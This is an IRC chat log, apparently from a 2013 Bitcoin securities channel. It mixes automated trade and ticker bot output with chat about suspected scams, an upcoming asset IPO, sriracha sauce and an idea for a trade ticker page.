BTC [-] Aug 06 19:29:28 [HAVELOCK] [AM100] 5 @ 0.04 = 0.2 BTC [+] Aug 06 19:29:40 [HAVELOCK] [XBOND] 100 @ 0.00103999 = 0.104 BTC [+] Aug 06 19:29:44 pankkake: "Haha, waiting for me to go to the police, the People's Bank report on illegal fund-raising." Aug 06 19:30:52 I would say he's faking it to have some reaction, but chinese might have a different psychology Aug 06 19:30:56 [BTCTC] [ACTIVEMINING] 365 @ 0.005865 = 2.1407 BTC [+] Aug 06 19:32:12 maybe. if you read through the actm thread for example, it's full of fud, too.. like almost every security thread on talk Aug 06 19:33:59 fud everywhere Aug 06 19:34:22 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002534 BTC [-] Aug 06 19:37:05 [HAVELOCK] [LABCO] 22 @ 0.0014 = 0.0308 BTC [+] Aug 06 19:37:09 [HAVELOCK] [LABCO] 8 @ 0.00135 = 0.0108 BTC [-] Aug 06 19:37:13 [HAVELOCK] [LABCO] 110 @ 0.00134 = 0.1474 BTC [-] Aug 06 19:37:21 [HAVELOCK] [LABCO] 100 @ 0.00133001 = 0.133 BTC [-] Aug 06 19:37:38 [HAVELOCK] [LABCO] 350 @ 0.001311 = 0.4589 BTC [-] Aug 06 19:37:55 [BTCTC] [LABCOIN] 25 @ 0.001559 = 0.039 BTC [+] Aug 06 19:39:28 maybe it Aug 06 19:39:58 it's a different mentality, but i can't understand how some companies handle those things.. an update every few days with one sentence? Aug 06 19:40:04 labcoin is the only one trying Aug 06 19:40:08 [HAVELOCK] [AM100] 3 @ 0.04 = 0.12 BTC [+] Aug 06 19:40:11 [HAVELOCK] [AM100] 7 @ 0.04 = 0.28 BTC [+] Aug 06 19:40:16 and actm has improved thanks to street Aug 06 19:40:55 uit Aug 06 19:41:00 it's not a matter of "fud" Aug 06 19:41:07 they raised so much money, why would they care now? Aug 06 19:41:11 it's a matter of some scammers creating a fake asicminer and trying to pump it. Aug 06 19:41:39 yes, but with simple things.. like pictures, regular updates etc., you could pump it even more Aug 06 19:41:59 [HAVELOCK] [XBOND] 350 @ 0.00103999 = 0.364 BTC [+] Aug 06 19:42:10 no. understand : scamming is not a rational process. Aug 06 19:42:25 the idea is to discourage the thinking people and emotionally enslave the idiots. Aug 06 19:42:32 i'd say it's the same as a legit business, but without delivery Aug 06 19:42:48 well, that's how i'd do things at least xD Aug 06 19:42:54 and saying that you'd give away your cluelessness :) Aug 06 19:43:20 scams don't work on honest, intelligent people. Aug 06 19:43:21 the amc thread is spot on, on the emotional enslavement Aug 06 19:43:30 scams work on greedy idiots with inferiority complexes. Aug 06 19:43:37 it just makes me cringe Aug 06 19:44:04 so you fuel their desires by limiting information? Aug 06 19:44:15 only give out very little, so they crave? Aug 06 19:44:19 again, consider the classical case of the email scam. Aug 06 19:44:38 as i've said about fiddy times, it's not badly spelled and badly thought out because nobody in nigeria can be found who can spell Aug 06 19:44:45 [BTCTC] [BTCGARDEN] 28 @ 0.01582 = 0.443 BTC [+] Aug 06 19:44:46 [BTCTC] [BTCGARDEN] 1 @ 0.01583 BTC [+] Aug 06 19:44:49 it's badly spelled because this way it repells the smart people early. Aug 06 19:45:00 false positives are the only major cost of the spammer. Aug 06 19:45:06 and so false positives is what he needs to control. Aug 06 19:45:13 [BTCTC] [LABCOIN] 235 @ 0.001572 = 0.3694 BTC [+] Aug 06 19:45:15 [BTCTC] [LABCOIN] 35 @ 0.001574 = 0.0551 BTC [+] Aug 06 19:45:15 [BTCTC] [LABCOIN] 424 @ 0.001587 = 0.6729 BTC [+] Aug 06 19:45:16 [BTCTC] [LABCOIN] 6790 @ 0.001588 = 10.7825 BTC [+] Aug 06 19:45:23 hmm interesting view Aug 06 19:45:53 so, giving out "Actual updates" might put you in the worst position ever : get the attention of a lot of people who are mostly sane, and so won't ever let you scam them. Aug 06 19:46:22 giving shit allows you to string out the idiots and only the idiots for years, as bfl has recently proven but otherwise as it's been documented ot high heavens already. Aug 06 19:48:16 yea Aug 06 19:48:39 [HAVELOCK] [LABCO] 100 @ 0.00125 = 0.125 BTC [-] Aug 06 19:48:45 [HAVELOCK] [LABCO] 1000 @ 0.00115 = 1.15 BTC [-] Aug 06 19:49:08 [HAVELOCK] [AM100] 5 @ 0.0399999 = 0.2 BTC [-] Aug 06 19:49:24 did you take a look at cointerra? Aug 06 19:49:37 i haven't. Aug 06 19:49:54 atm i was lolling at the fact that somehow me and the girl are the topic of the fake-asicminer thread. Aug 06 19:50:00 i guess im famous nao. Aug 06 19:50:18 [BTCTC] [TAT.ASICMINER] 2 @ 0.0402 = 0.0804 BTC [-] Aug 06 19:50:29 hehe, is that something new to you? :p Aug 06 19:50:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.04059 BTC [+] Aug 06 19:50:53 it started because someone mentioned mpex Aug 06 19:51:17 i guess i own The Citadel of Evil Aug 06 19:51:50 the guy everyone likes to hate or something Aug 06 19:52:02 "It's like a founders club where only the cool kid OG bitcoin miners can play." << i guess that's appropriate Aug 06 19:52:04 [HAVELOCK] [XBOND] 183 @ 0.00103999 = 0.1903 BTC [+] Aug 06 19:52:07 [HAVELOCK] [XBOND] 130 @ 0.00103999 = 0.1352 BTC [+] Aug 06 19:52:20 [BTCTC] [ASICMINER-PT] 1 @ 4.06 BTC [+] Aug 06 19:52:23 hehe Aug 06 19:52:35 eh come on, anyone who finds a block can play. Aug 06 19:53:48 since when is mpex around? Aug 06 19:54:10 heh, OG Aug 06 19:54:25 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002392 BTC [-] Aug 06 19:54:42 [HAVELOCK] [XBOND] 1 @ 0.00104 BTC [+] Aug 06 19:54:53 the options page since august 2011. Aug 06 19:54:54 [BTCTC] [TAT.VIRTUALMINE] 55 @ 0.00239 = 0.1315 BTC [-] Aug 06 19:54:56 Failing last since 2011. Aug 06 19:54:58 mpex itself since april 2012 Aug 06 19:55:03 [HAVELOCK] [AM100] 5 @ 0.0399999 = 0.2 BTC [-] Aug 06 19:55:11 [HAVELOCK] [AM100] 5 @ 0.0399999 = 0.2 BTC [-] Aug 06 19:55:13 "failing last since 2011"? Aug 06 19:55:14 first ipo was in feb 2nd in march iirc. Aug 06 19:55:29 dexX7 yeah, was the tagline for a while. mpex, failing last. since 2011. Aug 06 19:55:48 [HAVELOCK] [XBOND] 300 @ 0.00104 = 0.312 BTC [+] Aug 06 19:56:09 [BTCTC] [DMS.SELLING] 6 @ 0.02319 = 0.1391 BTC [-] Aug 06 19:57:12 [BTCTC] [ACTIVEMINING] 30 @ 0.005904 = 0.1771 BTC [+] Aug 06 19:57:50 [BTCTC] [DMS.SELLING] 8 @ 0.02319 = 0.1855 BTC [-] Aug 06 19:58:03 [BTCTC] [BASIC-MINING] 1 @ 0.414 BTC [-] Aug 06 19:59:52 [BTCTC] [BASIC-MINING] 3 @ 0.414 = 1.242 BTC [-] Aug 06 20:01:36 [BTCTC] [DMS.MINING] 48 @ 0.006305 = 0.3026 BTC [-] Aug 06 20:01:59 [BTCTC] [DMS.PURCHASE] 22 @ 0.02832 = 0.623 BTC [+] Aug 06 20:02:16 [BTCTC] [DMS.PURCHASE] 40 @ 0.02832 = 1.1328 BTC [+] Aug 06 20:03:54 [BTCTC] [BTCGARDEN] 3 @ 0.01593 = 0.0478 BTC [+] Aug 06 20:04:01 [BTCTC] [DMS.MINING] 1 @ 0.006686 BTC [+] Aug 06 20:04:03 [BTCTC] [DMS.MINING] 102 @ 0.006686 = 0.682 BTC [+] Aug 06 20:04:16 [BTCTC] [BASIC-MINING] 3 @ 0.413 = 1.239 BTC [-] Aug 06 20:04:57 [BTCTC] [DMS.SELLING] 9 @ 0.02319 = 0.2087 BTC [-] Aug 06 20:05:32 [BTCTC] [BTC-BOND] 140 @ 0.009999 = 1.3999 BTC [+] Aug 06 20:06:51 [BTCTC] [COGNITIVE] 1 @ 0.4147 BTC [+] Aug 06 20:10:02 [BTCTC] [DMS.MINING] 37 @ 0.006686 = 0.2474 BTC [+] Aug 06 20:10:12 [BTCTC] [BTCGARDEN] 25 @ 0.01587 = 0.3968 BTC [-] Aug 06 20:10:14 [BTCTC] [BTCGARDEN] 1 @ 0.01588 BTC [+] Aug 06 20:10:22 [BTCTC] [BTCGARDEN] 68 @ 0.01607 = 1.0928 BTC [+] Aug 06 20:10:24 [BTCTC] [BTCGARDEN] 32 @ 0.01608 = 0.5146 BTC [+] Aug 06 20:10:39 ;;ticker Aug 06 20:10:39 MtGox BTCUSD ticker | Best bid: 106.56013, Best ask: 107.38002, Bid-ask spread: 0.81989, Last trade: 106.56010, 24 hour volume: 10430.40655906, 24 hour low: 105.50000, 24 hour high: 107.50000, 24 hour vwap: 106.46385 Aug 06 20:11:19 !ticker btctc DMS.MINING Aug 06 20:11:21 [BTCT:DMS.MINING] 1D: 0.006305 / 0.00672 / 0.007499 (3108 shares, 20.9 BTC), 7D: 0.006305 / 0.00837 / 0.013 (45667 shares, 382.3 BTC), 30D: 0.006305 / 0.01198 / 0.01975 (104110 shares, 1246.9 BTC) Aug 06 20:11:24 !ticker btctc DMS.SELLING Aug 06 20:11:25 [BTCT:DMS.SELLING] 1D: 0.02155 / 0.02292 / 0.02399 (2207 shares, 50.6 BTC), 7D: 0.0201 / 0.0225 / 0.0264 (17778 shares, 400 BTC), 30D: 0.0176 / 0.02409 / 0.035716 (59920 shares, 1443.4 BTC) Aug 06 20:11:31 goood gooood Aug 06 20:11:45 mircea_popescu: what happened to the pop OIX was indicating? Aug 06 20:11:46 [BTCTC] [LABCOIN] 610 @ 0.001587 = 0.9681 BTC [-] Aug 06 20:11:47 [BTCTC] [LABCOIN] 40 @ 0.001591 = 0.0636 BTC [+] Aug 06 20:11:48 :P Aug 06 20:11:48 [BTCTC] [LABCOIN] 20 @ 0.001593 = 0.0319 BTC [+] Aug 06 20:12:28 wasn't it pointing at like 60 ? Aug 06 20:13:16 !ticker m ^OIX Aug 06 20:13:18 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 65.75329814 / 65.75329814 / (2940 shares, 1,686.19 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Aug 06 20:13:22 it still is Aug 06 20:14:15 [BTCTC] [BMF] 5 @ 0.042 = 0.21 BTC [+] Aug 06 20:16:31 [BTCTC] [DMS.MINING] 2 @ 0.006302 = 0.0126 BTC [-] Aug 06 20:16:45 [BTCTC] [DMS.MINING] 20 @ 0.0063 = 0.126 BTC [-] Aug 06 20:17:26 [BTCTC] [BASIC-MINING] 1 @ 0.414 BTC [+] Aug 06 20:18:34 ;;bc,stats Aug 06 20:18:37 Current Blocks: 250569 | Current Difficulty: 3.7392766136474565E7 | Next Difficulty At Block: 251999 | Next Difficulty In: 1430 blocks | Next Difficulty In About: 1 week, 0 days, 22 hours, 40 minutes, and 0 seconds | Next Difficulty Estimate: None | Estimated Percent Change: None Aug 06 20:18:47 ;;estimate Aug 06 20:18:47 Next difficulty estimate | None based on data since last change | 47884865.4011 based on data for last three days Aug 06 20:19:08 ;;nethash Aug 06 20:19:08 342778.448503 Aug 06 20:19:23 47 mil Aug 06 20:19:24 wut Aug 06 20:21:16 [BTCTC] [BTCGARDEN] 25 @ 0.01605 = 0.4013 BTC [-] Aug 06 20:21:17 [BTCTC] [BTCGARDEN] 45 @ 0.01606 = 0.7227 BTC [+] Aug 06 20:21:18 [BTCTC] [BTCGARDEN] 67 @ 0.01607 = 1.0767 BTC [+] Aug 06 20:21:20 [BTCTC] [BTCGARDEN] 268 @ 0.01608 = 4.3094 BTC [+] Aug 06 20:21:21 [BTCTC] [BTCGARDEN] 30 @ 0.01608 = 0.4824 BTC [+] Aug 06 20:21:22 [BTCTC] [BTCGARDEN] 56 @ 0.01608 = 0.9005 BTC [+] Aug 06 20:21:23 [BTCTC] [BTCGARDEN] 147 @ 0.01609 = 2.3652 BTC [+] Aug 06 20:21:24 [BTCTC] [BTCGARDEN] 112 @ 0.01609 = 1.8021 BTC [+] Aug 06 20:23:57 [BTCTC] [BASIC-MINING] 1 @ 0.413 BTC [-] Aug 06 20:25:12 [BTCTC] [ACTIVEMINING] 5 @ 0.005912 = 0.0296 BTC [+] Aug 06 20:31:08 [HAVELOCK] [AM100] 13 @ 0.0397 = 0.5161 BTC [-] Aug 06 20:32:12 [BTCTC] [BTCGARDEN] 5 @ 0.01608 = 0.0804 BTC [-] Aug 06 20:32:23 [BTCTC] [TAT.ASICMINER] 4 @ 0.0403 = 0.1612 BTC [-] Aug 06 20:33:15 [BTCTC] [ACTIVEMINING] 68 @ 0.006094 = 0.4144 BTC [+] Aug 06 20:33:17 [BTCTC] [ACTIVEMINING] 87 @ 0.006095 = 0.5303 BTC [+] Aug 06 20:34:19 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.002499 = 0.1 BTC [+] Aug 06 20:34:42 pankkake: https://bitcointalk.org/index.php?topic=264696.msg2878322#msg2878322 Aug 06 20:37:54 [BTCTC] [ACTIVEMINING] 68 @ 0.005914 = 0.4022 BTC [-] Aug 06 20:38:21 [HAVELOCK] [XBOND] 39 @ 0.00104 = 0.0406 BTC [+] Aug 06 20:39:36 [BTCTC] [TAT.VIRTUALMINE] 48 @ 0.002499 = 0.12 BTC [+] Aug 06 20:42:01 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.002499 = 0.0525 BTC [+] Aug 06 20:43:01 [BTCTC] [ACTIVEMINING] 4 @ 0.005913 = 0.0237 BTC [-] Aug 06 20:43:03 [BTCTC] [ACTIVEMINING] 47 @ 0.005914 = 0.278 BTC [+] Aug 06 20:43:15 [BTCTC] [TAT.ASICMINER] 1 @ 0.0403 BTC [-] Aug 06 20:44:36 [BTCTC] [RSM] 1 @ 0.012 BTC [-] Aug 06 20:45:29 [BTCTC] [KENILWORTH] 12 @ 0.0018 = 0.0216 BTC [+] Aug 06 20:46:43 [BTCTC] [MININGCO.ETF] 1 @ 1.89 BTC [-] Aug 06 20:47:02 [HAVELOCK] [XBOND] 48 @ 0.00104 = 0.0499 BTC [+] Aug 06 20:47:48 [BTCTC] [TAT.MINIGAME] 2 @ 0.00023 = 0.0005 BTC [+] Aug 06 20:48:48 [BTCTC] [LABCOIN] 10 @ 0.001589 = 0.0159 BTC [-] Aug 06 20:48:49 [BTCTC] [LABCOIN] 18 @ 0.001598 = 0.0288 BTC [+] Aug 06 20:49:51 [BTCTC] [LABCOIN] 12 @ 0.001598 = 0.0192 BTC [+] Aug 06 20:50:36 [BTCTC] [DMS.SELLING] 2 @ 0.02188 = 0.0438 BTC [-] Aug 06 20:50:37 [BTCTC] [DMS.SELLING] 2 @ 0.02188 = 0.0438 BTC [-] Aug 06 20:50:39 [BTCTC] [DMS.SELLING] 20 @ 0.02188 = 0.4376 BTC [-] Aug 06 20:52:18 [BTCTC] [DMS.SELLING] 32 @ 0.02176 = 0.6963 BTC [-] Aug 06 20:53:25 [BTCTC] [BASIC-MINING] 1 @ 0.4127 BTC [-] Aug 06 20:54:08 [HAVELOCK] [AM100] 8 @ 0.0397 = 0.3176 BTC [-] Aug 06 20:55:29 [BTCTC] [BITVPS] 24 @ 0.00217 = 0.0521 BTC [+] Aug 06 20:56:03 [BTCTC] [BTCGARDEN] 25 @ 0.01607 = 0.4018 BTC [-] Aug 06 20:58:18 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [-] Aug 06 20:59:14 [BTCTC] [DMS.PURCHASE] 11 @ 0.02832 = 0.3115 BTC [+] Aug 06 21:00:27 [BTCTC] [ACTIVEMINING] 1 @ 0.006063 BTC [+] Aug 06 21:03:04 [BTCTC] [BITVPS] 1 @ 0.002275 BTC [+] Aug 06 21:04:04 [BTCTC] [RSM] 1 @ 0.012 BTC [-] Aug 06 21:04:12 [BTCTC] [ACTIVEMINING] 28 @ 0.005903 = 0.1653 BTC [-] Aug 06 21:04:30 [BTCTC] [PAJKA.BOND] 1 @ 0.026 BTC [+] Aug 06 21:04:58 [BTCTC] [BITVPS] 10 @ 0.002398 = 0.024 BTC [+] Aug 06 21:07:31 [BTCTC] [BASIC-MINING] 1 @ 0.4127 BTC [-] Aug 06 21:07:34 [HAVELOCK] [AM100] 2 @ 0.0397 = 0.0794 BTC [-] Aug 06 21:07:55 [BTCTC] [ACTIVEMINING] 50 @ 0.006048 = 0.3024 BTC [+] Aug 06 21:12:59 [HAVELOCK] [AM100] 2 @ 0.0397 = 0.0794 BTC [-] Aug 06 21:13:32 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0025 BTC [+] Aug 06 21:13:34 [BTCTC] [BTCGARDEN] 25 @ 0.01607 = 0.4018 BTC [+] Aug 06 21:13:49 [HAVELOCK] [XBOND] 65 @ 0.00104 = 0.0676 BTC [+] Aug 06 21:15:08 [BTCTC] [DMS.MINING] 1 @ 0.006687 BTC [+] Aug 06 21:24:39 [BTCTC] [ACTIVEMINING] 50 @ 0.005995 = 0.2998 BTC [-] Aug 06 21:26:16 [MPEX] [S.MPOE] 5400 @ 0.00082738 = 4.4679 BTC [-] Aug 06 21:26:18 [MPEX] [S.MPOE] 7350 @ 0.00082682 = 6.0771 BTC [-] Aug 06 21:29:25 [HAVELOCK] [XBOND] 15 @ 0.00104 = 0.0156 BTC [+] Aug 06 21:29:59 [BTCTC] [BASIC-MINING] 1 @ 0.4127 BTC [-] Aug 06 21:30:00 [BTCTC] [BASIC-MINING] 3 @ 0.4126 = 1.2378 BTC [-] Aug 06 21:30:02 [BTCTC] [BASIC-MINING] 1 @ 0.4125 BTC [-] Aug 06 21:30:03 [BTCTC] [BASIC-MINING] 1 @ 0.4125 BTC [-] Aug 06 21:30:03 [BTCTC] [BASIC-MINING] 5 @ 0.4101 = 2.0505 BTC [-] Aug 06 21:30:04 [BTCTC] [BASIC-MINING] 25 @ 0.41 = 10.25 BTC [-] Aug 06 21:39:17 [BTCTC] [DMS.SELLING] 2 @ 0.02176 = 0.0435 BTC [-] Aug 06 21:41:43 [BTCTC] [BITVPS] 9 @ 0.002275 = 0.0205 BTC [-] Aug 06 21:41:48 guys Aug 06 21:42:28 fabrizziop in otc Aug 06 21:42:49 [BTCTC] [TAT.VIRTUALMINE] 58 @ 0.0025 = 0.145 BTC [+] Aug 06 21:46:38 [BTCTC] [KENILWORTH] 200 @ 0.0018 = 0.36 BTC [+] Aug 06 21:48:13 [BTCTC] [BASIC-MINING] 5 @ 0.405 = 2.025 BTC [-] Aug 06 21:48:15 [BTCTC] [BASIC-MINING] 3 @ 0.405 = 1.215 BTC [-] Aug 06 21:48:16 [BTCTC] [BASIC-MINING] 1 @ 0.4005 BTC [-] Aug 06 21:48:16 I have a sriracha addiction Aug 06 21:48:17 [BTCTC] [BASIC-MINING] 4 @ 0.3975 = 1.59 BTC [-] Aug 06 21:48:18 [BTCTC] [BASIC-MINING] 12 @ 0.3974 = 4.7688 BTC [-] Aug 06 21:48:47 I just ordered some fancy sriracha Aug 06 21:48:50 [BTCTC] [LABCOIN] 6 @ 0.001552 = 0.0093 BTC [-] Aug 06 21:49:14 Do tell Aug 06 21:49:20 [BTCTC] [LTC-ATF.B2] 1 @ 0.0103 BTC [-] Aug 06 21:49:21 [BTCTC] [LTC-ATF.B2] 6 @ 0.0103 = 0.0618 BTC [-] Aug 06 21:49:30 I like to make my own, but takes too long. Aug 06 21:49:56 [BTCTC] [TAT.ASICMINER] 2 @ 0.0403 = 0.0806 BTC [-] Aug 06 21:50:16 [BTCTC] [COGNITIVE] 2 @ 0.41 = 0.82 BTC [-] Aug 06 21:50:21 http://organicvillefoods.com/products/condiments/sriracha-sauce/ Aug 06 21:50:26 [HAVELOCK] [AM100] 1 @ 0.03979999 BTC [+] Aug 06 21:50:26 Sriracha Sauce « Organicville Foods Aug 06 21:50:43 [BTCTC] [COGNITIVE] 2 @ 0.4001 = 0.8002 BTC [-] Aug 06 21:51:03 [BTCTC] [COGNITIVE] 2 @ 0.4 = 0.8 BTC [-] Aug 06 21:51:08 Had it before? Aug 06 21:52:31 [BTCTC] [TAT.ASICMINER] 1 @ 0.04002 BTC [-] Aug 06 21:52:49 Mine, I like to grill the peppers and garlic, pickle them in apple cider vinager, sugar, blend, separate, boil... reduce. Done. Best stuff in the world. Aug 06 21:53:29 [BTCTC] [DMS.SELLING] 40 @ 0.02319 = 0.9276 BTC [+] Aug 06 21:53:31 [BTCTC] [DMS.SELLING] 20 @ 0.02319 = 0.4638 BTC [+] Aug 06 21:53:33 [BTCTC] [DMS.SELLING] 30 @ 0.0232 = 0.696 BTC [+] Aug 06 21:54:07 [HAVELOCK] [XBOND] 8 @ 0.00104 = 0.0083 BTC [+] Aug 06 21:55:35 [BTCTC] [DMS.PURCHASE] 45 @ 0.02832 = 1.2744 BTC [+] Aug 06 21:57:10 [BTCTC] [TAT.ASICMINER] 3 @ 0.0403 = 0.1209 BTC [+] Aug 06 21:57:26 [BTCTC] [LABCOIN] 292 @ 0.001554 = 0.4538 BTC [+] Aug 06 21:57:28 [BTCTC] [LABCOIN] 6492 @ 0.001555 = 10.0951 BTC [+] Aug 06 21:57:40 [MPEX] [S.MPOE] 850 @ 0.00082885 = 0.7045 BTC [+] Aug 06 21:59:34 havent had it before Aug 06 21:59:37 just trying it Aug 06 22:02:06 [BTCTC] [DMS.MINING] 74 @ 0.006686 = 0.4948 BTC [-] Aug 06 22:03:58 i love sriracha sauce Aug 06 22:04:11 good stuff Aug 06 22:04:19 but thats the wrong brand Aug 06 22:04:21 you want the rooster one Aug 06 22:04:24 with the green lid Aug 06 22:05:37 Lay's makes Sriracha flavored chips (crisps) now, yummy Aug 06 22:05:38 [BTCTC] [LABCOIN] 4 @ 0.001596 = 0.0064 BTC [+] Aug 06 22:06:17 When Lays tried to make a Sriracha flavored chip, it just tasted like vinegar, I think we can do better. Aug 06 22:06:21 sriracha is awesome Aug 06 22:06:40 [BTCTC] [TAT.ASICMINER] 64 @ 0.0403 = 2.5792 BTC [+] Aug 06 22:07:06 [BTCTC] [ASICMINER-PT] 1 @ 4.004 BTC [-] Aug 06 22:07:07 [BTCTC] [ASICMINER-PT] 1 @ 4.003 BTC [-] Aug 06 22:07:57 Rulother, that's why purists use wavy lays and dip them in the real stuff Aug 06 22:09:47 [BTCTC] [BTCGARDEN] 18 @ 0.01607 = 0.2893 BTC [+] Aug 06 22:10:21 does assbot know about fenix yet? Aug 06 22:11:12 assbot knows all Aug 06 22:11:19 [BTCTC] [BASIC-MINING] 1 @ 0.4 BTC [+] Aug 06 22:11:21 [BTCTC] [BASIC-MINING] 3 @ 0.4 = 1.2 BTC [+] Aug 06 22:11:22 [BTCTC] [ACTIVEMINING] 40 @ 0.006099 = 0.244 BTC [+] Aug 06 22:12:01 True, tried it on twinkies recently... Not bad Aug 06 22:12:45 [BTCTC] [ASICMINER-PT] 2 @ 4.024 = 8.048 BTC [+] Aug 06 22:13:10 [BTCTC] [BASIC-MINING] 1 @ 0.3975 BTC [-] Aug 06 22:13:12 Oreos Aug 06 22:13:12 [BTCTC] [BASIC-MINING] 8 @ 0.3974 = 3.1792 BTC [-] Aug 06 22:13:56 warning your friends is optional Aug 06 22:16:25 lol, I'm willing to try it. Aug 06 22:17:23 it's like the Macklemore version of dark chocolate and chilies Aug 06 22:19:47 Would anyone be interested in a live twitter feed of trades on the four major exchanges? Aug 06 22:20:52 [BTCTC] [COGNITIVE] 2 @ 0.3923 = 0.7846 BTC [-] Aug 06 22:20:59 bitfunder use to have a really good twitter bot Aug 06 22:21:16 tweet all the trades, not sure if still running, but yeah parseval would be neat Aug 06 22:21:49 [BTCTC] [LABCOIN] 102 @ 0.001597 = 0.1629 BTC [+] Aug 06 22:22:07 hmm, should be pretty simple to do. I could make it look just like assbot and assetbot output Aug 06 22:23:02 [BTCTC] [DMS.PURCHASE] 25 @ 0.02832 = 0.708 BTC [+] Aug 06 22:23:03 when i want quotes i come here, twitter is more to educate the general public Aug 06 22:23:27 [BTCTC] [ASICMINER-PT] 1 @ 4.009 BTC [-] Aug 06 22:23:37 you can do inspirational ones like, "You don't have to be an accredited investor if you blah blah blah.." Aug 06 22:25:28 [BTCTC] [DMS.MINING] 1 @ 0.006301 BTC [-] Aug 06 22:25:29 [BTCTC] [DMS.MINING] 5 @ 0.0063 = 0.0315 BTC [-] Aug 06 22:25:29 [BTCTC] [DMS.MINING] 39 @ 0.006265 = 0.2443 BTC [-] Aug 06 22:30:03 [BTCTC] [DMS.MINING] 11 @ 0.00665 = 0.0732 BTC [+] Aug 06 22:30:24 [MPEX] [S.MPOE] 1750 @ 0.00082885 = 1.4505 BTC [+] Aug 06 22:30:26 [MPEX] [S.MPOE] 6450 @ 0.00082922 = 5.3485 BTC [+] Aug 06 22:32:40 twitter is unreliable for this amount of messages Aug 06 22:33:36 [BTCTC] [LABCOIN] 12 @ 0.001599 = 0.0192 BTC [+] Aug 06 22:33:37 [BTCTC] [LABCOIN] 28 @ 0.0016 = 0.0448 BTC [+] Aug 06 22:35:54 [BTCTC] [BTCGARDEN] 30 @ 0.01606 = 0.4818 BTC [-] Aug 06 22:35:55 hmm, yeah, I'm reading that it limits you to 1000 tweets a day or so Aug 06 22:36:25 Maybe I'll just make a ticker page instead Aug 06 22:36:29 [BTCTC] [BTCGARDEN] 150 @ 0.01607 = 2.4105 BTC [+] Aug 06 22:37:00 i was thinking about a scrolling ticker today heh like you see in the news Aug 06 22:37:20 lil something running in the background Aug 06 22:40:36 [BTCTC] [BASIC-MINING] 3 @ 0.3964 = 1.1892 BTC [-] Aug 06 22:40:38 [BTCTC] [BASIC-MINING] 2 @ 0.396 = 0.792 BTC [-] Aug 06 22:40:50 Something like this running across the top of my site maybe.. http://joekuan.org/demos/Ticker_ExtJs_4/ Aug 06 22:42:25 [BTCTC] [ASICMINER-PT] 2 @ 4.01 = 8.02 BTC [+] Aug 06 22:43:12 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 06 22:44:25 extjs, yuck Aug 06 22:45:57 [BTCTC] [LABCOIN] 74 @ 0.0016 = 0.1184 BTC [+] Aug 06 22:46:24 [BTCTC] [LABCOIN] 103 @ 0.001599 = 0.1647 BTC [-] Aug 06 22:47:04 I started looking into extjs but the only thing I was impressed with was their 'desktop' simulator Aug 06 22:47:42 [BTCTC] [ASICMINER-PT] 2 @ 4.024 = 8.048 BTC [+] Aug 06 22:47:43 [BTCTC] [ASICMINER-PT] 1 @ 4.025 BTC [+] Aug 06 22:47:44 [BTCTC] [ASICMINER-PT] 1 @ 4.025 BTC [+] Aug 06 22:47:55 i made an app with that long ago Aug 06 22:48:09 [BTCTC] [TAT.ASICMINER] 9 @ 0.04002 = 0.3602 BTC [-] Aug 06 22:48:12 [BTCTC] [TAT.ASICMINER] 26 @ 0.04002 = 1.0405 BTC [-] Aug 06 22:48:28 [BTCTC] [LABCOIN] 250 @ 0.001599 = 0.3998 BTC [-] Aug 06 22:48:39 [BTCTC] [BTC-BOND] 5 @ 0.009991 = 0.05 BTC [-] Aug 06 22:48:58 [BTCTC] [TAT.ASICMINER] 10 @ 0.04001 = 0.4001 BTC [-] Aug 06 22:49:02 [HAVELOCK] [AM100] 1 @ 0.0397 BTC [-] Aug 06 22:49:55 [BTCTC] [B.YABMC] 5 @ 0.002317 = 0.0116 BTC [-] Aug 06 22:52:16 [BTCTC] [BTCGARDEN] 28 @ 0.01565 = 0.4382 BTC [-] Aug 06 22:52:17 [BTCTC] [BTCGARDEN] 1 @ 0.01564 BTC [-] Aug 06 22:52:18 [BTCTC] [BTCGARDEN] 26 @ 0.01562 = 0.4061 BTC [-] Aug 06 22:52:19 [BTCTC] [BTCGARDEN] 300 @ 0.01561 = 4.683 BTC [-] Aug 06 22:52:20 [BTCTC] [BTCGARDEN] 370 @ 0.0156 = 5.772 BTC [-] Aug 06 22:52:22 [BTCTC] [BTCGARDEN] 135 @ 0.01558 = 2.1033 BTC [-] Aug 06 22:52:23 [BTCTC] [BTCGARDEN] 1000 @ 0.01557 = 15.57 BTC [-] Aug 06 22:52:24 [BTCTC] [BTCGARDEN] 7 @ 0.01557 = 0.109 BTC [-] Aug 06 22:52:25 [BTCTC] [BTCGARDEN] 200 @ 0.01556 = 3.112 BTC [-] Aug 06 22:52:26 [BTCTC] [BTCGARDEN] 120 @ 0.01556 = 1.8672 BTC [-] Aug 06 22:52:27 [BTCTC] [BTCGARDEN] 120 @ 0.01556 = 1.8672 BTC [-] Aug 06 22:52:29 [BTCTC] [BTCGARDEN] 455 @ 0.01555 = 7.0753 BTC [-] Aug 06 22:52:30 [BTCTC] [BTCGARDEN] 10 @ 0.01554 = 0.1554 BTC [-] Aug 06 22:52:30 [BTCTC] [BTCGARDEN] 400 @ 0.01554 = 6.216 BTC [-] Aug 06 22:52:31 [BTCTC] [BTCGARDEN] 1100 @ 0.01554 = 17.094 BTC [-] Aug 06 22:52:32 [BTCTC] [BTCGARDEN] 31 @ 0.01554 = 0.4817 BTC [-] Aug 06 22:55:16 new asset: IPO next monday. (official IPO announcement coming shortly) https://www.havelockinvestments.com/fund.php?symbol=CFIG Aug 06 22:56:10 [BTCTC] [LABCOIN] 1647 @ 0.001599 = 2.6336 BTC [-] Aug 06 22:57:40 full prospectus: https://www.havelockinvestments.com/reportdownload.php?id=17 Aug 06 23:00:37 [BTCTC] [BTCGARDEN] 28 @ 0.01555 = 0.4354 BTC [+] Aug 06 23:00:40 [BTCTC] [BTCGARDEN] 275 @ 0.01554 = 4.2735 BTC [-] Aug 06 23:00:42 [BTCTC] [BTCGARDEN] 28 @ 0.01553 = 0.4348 BTC [-] Aug 06 23:00:44 [BTCTC] [BTCGARDEN] 299 @ 0.01553 = 4.6435 BTC [-] Aug 06 23:00:47 [BTCTC] [BTCGARDEN] 103 @ 0.01553 = 1.5996 BTC [-] Aug 06 23:00:50 